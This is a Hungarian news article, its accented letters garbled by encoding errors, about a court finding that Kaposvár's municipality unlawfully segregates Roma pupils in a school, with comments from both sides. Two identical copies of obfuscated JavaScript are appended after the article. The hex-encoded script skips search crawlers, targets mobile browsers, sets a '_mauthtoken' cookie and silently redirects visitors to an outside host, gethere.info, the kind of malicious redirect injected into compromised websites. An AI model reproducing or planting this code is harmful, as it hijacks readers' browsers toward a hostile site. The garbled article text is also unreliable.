PolgA?ri pert indAi??tott az EsAi??lyt a HA?trA?nyos HelyzetAi?? Gyerekeknek AlapAi??tvA?ny KaposvA?r Megyei JogA? VA?ros Ai??nkormA?nyzata ellen, azt kifogA?solva, hogy fenntart egy olyan iskolA?t, ahol szinte csak roma diA?kok tanulnak. Azt kAi??rtAi??k a bAi??rA?sA?gtA?l, hogy A?llapAi??tsa meg a szegregA?ciA?t, mondja ki, hogy a tanulA?kat hA?trA?nyos megkA?lAi??nbAi??ztetAi??s Ai??ri, Ai??s kAi??telezze az Ai??nkormA?nyzatot a jogsAi??rtAi??s megszA?ntetAi??sAi??re.

A bAi??rA?sA?g hatA?rozatA?ban megA?llapAi??totta, hogy a cigA?ny etnikai kisebbsAi??ghez tartozA? tanulA?kat az oktatA?si intAi??zmAi??nyben jogellenesen elkA?lAi??nAi??tik, Ai??s hA?trA?nyosan megkA?lAi??nbAi??ztetik Ai??ket. UtA?bbit akkor, amikor olyan oktatA?s biztosAi??tanak szA?mukra, hogy az Ai??nkormA?nyzati fenntartA?sban mAi??kAi??dAi??, normA?l tantervAi?? iskolA?khoz kAi??pest magasabb az Ai??vfolyamismAi??tlAi??sek szA?ma, a tanulmA?nyok abbahagyA?sA?nak arA?nya Ai??s a hiA?nyzA?s, ugyanakkor alacsonyabb az orszA?gos kompetenciamAi??rAi??s sorA?n elAi??rt eredmAi??ny Ai??s a tovA?bbtanulA?k arA?nya.

A bAi??rA?sA?g kAi??telezte az alperest, hogy a jogsAi??rtAi??st hagyja abba, tovA?bbA? arra, hogy a felperesnek fizessen meg 250 ezer forint perkAi??ltsAi??get. A felperesnek az iskola bezA?rA?sA?ra vonatkozA? keresetAi??t ugyanakkor hatA?skAi??r hiA?nyA?ban elutasAi??totta.

ZA?rjA?k be

MohA?csi ErzsAi??bet az alapAi??tvA?ny elnAi??ke a hatA?rozat kihirdetAi??se utA?n A?jsA?gAi??rA?knak elmondta: egy lAi??pAi??ssel kAi??zelebb kerA?ltek az alapAi??tvA?ny cAi??ljA?hoz, ahhoz, hogy megszA?ntessAi??k az iskolai szegregA?ciA?t, zA?rjA?k be azokat az intAi??zmAi??nyeket, amelyekben roma gyerekeket elkA?lAi??nAi??tve oktatnak.

Az alapAi??tvA?ny elnAi??ke az Ai??nkormA?nyzat esetleges fellebbezAi??se kapcsA?n azt mondta: „akkor – A?gy gondolom – az A?llA?spontunk nagyon kAi??nnyen vAi??dhetAi?? lesz”. HozzA?tette: jogilag is vAi??dhetAi??bb Ai??s gazdasA?gilag is sokkal kifizetAi??dAi??bb, ha ezt az iskolA?t bezA?rjA?k, Ai??s a gyerekeket integrA?ljA?k a tAi??bbi iskolA?kba. Ez egyAi??bkAi??nt korA?bbi perek utA?n Ai??gy tAi??rtAi??nt – jegyezte meg MohA?csi ErzsAi??bet.

TAi??rvAi??nyes keretek

SzijA?rtA? Attila, az Ai??nkormA?nyzat jogi kAi??pviselAi??je a dAi??ntAi??st Ai??rtAi??kelve A?gy fogalmazott: a bAi??rA?sA?g megA?llapAi??totta a szegregA?ciA?t, de elutasAi??totta a felperes keresetAi??nek azt a, szerintA?k leglAi??nyegesebb rAi??szAi??t, hogy a cigA?ny szA?rmazA?sA? gyerekeket osszA?k el mA?s iskolA?k kAi??zAi??tt. „TehA?t erre vonatkozA?an a bAi??rA?sA?g nem adott helyt a felperes keresetAi??nek” – tette hozzA? a jogi kAi??pviselAi??.

Stickel PAi??ter, az Ai??nkormA?nyzat kulturA?lis igazgatA?ja szerint nem szegregA?lt az iskola, tAi??rvAi??nyes keretek kAi??zAi??tt mAi??kAi??dik, az oktatA?si minAi??sAi??ge Ai??s szAi??nvonala megfelel az elAi??Ai??rtaknak. A pedagA?gusok, a szA?lAi??k Ai??s a gyerekek is elAi??gedettek az intAi??zmAi??ny mAi??kAi??dAi??sAi??vel – hangsA?lyozta Stickel PAi??ter, hozzA?tAi??ve: nem az a megoldA?s, hogy megszA?ntetik az iskolA?t, hanem az, hogy tovA?bbi segAi??tsAi??get adjanak a felperes A?ltal kifogA?solt mutatA?k javulA?sA?hoz.

A felek a kAi??zhezvAi??teltAi??l szA?mAi??tott 15 napon belA?l fellebbezhetnek a hatA?rozat ellen.

A perben szereplAi?? iskolA?ban 180 diA?k tanul. A felperes A?ltal ismertetett adatok szerint egy fAi??vA?rosi, VIII. kerA?leti iskola utA?n ebben a kaposvA?ri iskolA?ban a legmagasabb, 93 szA?zalAi??knA?l nagyobb a cigA?ny tanulA?k arA?nya.

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}